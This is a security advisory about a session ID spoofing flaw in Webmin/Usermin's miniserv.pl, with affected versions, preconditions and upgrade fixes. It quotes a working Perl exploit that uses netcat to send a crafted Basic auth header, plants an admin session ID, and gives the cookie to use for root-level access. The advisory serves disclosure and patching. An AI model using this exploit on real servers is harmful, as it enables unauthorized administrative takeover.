COMMAND

	Webmin/Usermin Session ID Spoofing Vulnerability

SYSTEMS AFFECTED

	  Webmin Version: 0.960
	  Usermin Version: 0.90
	
	 Update (24 Februrary 2003)
	 ======
	
	  Webmin Version: 1.060
	  Usermin Version: 0.990 

PROBLEM

	Keigo Yamazaki of LAC Co.,Ltd [http://www.lac.co.jp/] found :
	
	Webmin is a web-based system administration tool for Unix. Usermin is  a
	web interface that allows all users on a Unix system to  easily  receive
	mails and to perform SSH and mail forwarding configuration.
	  
	Internal communication between the parent process and the child  process
	using named pipes occur in these software packages  during  creation  or
	verification of a session ID, or during the setting process of  password
	timeouts. Because the control characters contained in  the  data  passed
	as authentication information are not  eliminated,  it  is  possible  to
	make Webmin and Usermin to acknowledge the combination of any  user  and
	session ID specified by an attacker. If  the  attacker  could  log  into
	Webmin by using this problem, there  is  a  possibility  that  arbitrary
	commands may be executed with root privileges.
	
	  [Preconditions for a successful exploit]
	
	In the case of Webmin :
	
	  * Webmin->Configuration->Authentication
	    "Enable password timeouts" is enabled
	  * if a valid Webmin username is known
	    by default, user "admin" exists and this user can use all the 
	    functions, including command shell
	
	In the case of Usermin:
	 
	  * if password timeout is enabled
	  * if a valid Usermin username is known
	
	
	 Update (24 Februrary 2003)
	 ======
	
	In  Secure  Net  Service(SNS)  security  advisory  [snsadv@lac.co.jp]  a
	Computer Security Laboratory, LAC :
	
	 http://www.lac.co.jp/security/english/snsadv_e/62_e.html
	
	Bug discovered by: Keigo Yamazaki, thanks to: Jamie Cameron
	
	A vulnerability that could result in a session  ID  spoofing  exists  in
	miniserv.pl, which is a webserver program  that  gets  both  Webmin  and
	Usermin to run.
	
	 Problem Description:
	 --------------------
	
	Webmin is a web-based system administration tool for Unix. Usermin is  a
	web interface that allows all users on a Unix system to  easily  receive
	mails and to perform SSH and mail forwarding configuration.
	
	Miniserv.pl is a webserver program that gets both Webmin and Usermin  to
	run. Miniserv.pl  carries  out  named  pipe  communication  between  the
	parent and the child  process  during  for  example,  the  creation  and
	confirmation of a session ID (session used for access  control  via  the
	Web) and during the password timeout process.
	
	Miniserv.pl does not check whether metacharacters, such as line feed  or
	carriage return, are included with BASE64  encoded  strings  during  the
	BASIC authentication process. As a result, any  user  can  login  as  an
	administrative user "admin" and spoof a session ID by using the pipe.
	
	Exploitation therefore, could make it possible for attackers  to  bypass
	authentication and execute arbitrary command as root.
	
	 [Preconditions for the exploit]
	
	      Webmin:
	         * Webmin -> Configuration -> Authentication and "Enable password
	           timeouts" is ON
	         * a valid Webmin username is known
	
	      Usermin:
	         * "Enable password timeouts" is ON
	         * a valid Webmin username is known
	
	
	-Also-
	
	Carl Livitt [carl@learningshophull.co.uk] says :
	
	Attached is an exploit for the latest Webmin  vulnerability.  It  relies
	on a non-default setting (passdelay) to be enabled.
	
	Webmin can verify user authentication by use of a session ID (SID)  that
	is assigned when a user successfully  authenticates  to  Webmin.  It  is
	possible to inject a fake SID into the session ID database  by  using  a
	malicious username  containing  control  sequences  used  internally  by
	Webmin.
	
	This exploit simply creates a SID of 1234567890 for  the  user  'admin'.
	Then, it is a simple case of creating a cookie in your favorite  browser
	containing:
	
	sid=1234567890; testing=1
	
	Such that the Cookie HTTP header contains:
	
	Cookie: sid=1234567890; testing=1
	
	When the webmin server recieves  this  cookie,  it  is  verified  as  an
	authentic SID and an attacker can take complete control  of  the  Webmin
	server... this is basically root access to the box it is running on.
	
	
	#!/usr/bin/perl
	#
	# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
	#
	# Inserts a fake session_id into the sessions list of webmin.
	# Does no error checking... if remote host is not found, no
	# error will be reported.
	#
	
	print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
	print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";
	
	$nc="/usr/bin/netcat";
	
	if($#ARGV == -1) {
		print "Syntax:\n\t$0 hostname\n";
		exit(1);
	}
	
	$hostname=$ARGV[0];
	
	if ( ! -x $nc ) {
		print "netcat not found!\n";
		exit(2);
	}
	
	open(NC, "|$nc $hostname 10000 >& /dev/null");
	print NC "GET / HTTP/1.1\n";
	print NC "Host: $hostname\n";
	print NC "User-agent: webmin\n";
	print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
	close(NC);
	
	print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
	print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
	print "be authenticated to the webmin server!\n\n";
	print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
	

SOLUTION

	This problem can be eliminated by upgrading  to  Webmin  version  0.970/
	Usermin version 0.910, which are available at:
	
	http://www.webmin.com/
	
	
	 Update (24 Februrary 2003)
	 ======
	
	This problem can be eliminated by upgrading to Webmin version 1.070  and
	Usermin version 1.000 available at:
	
	http://www.webmin.com/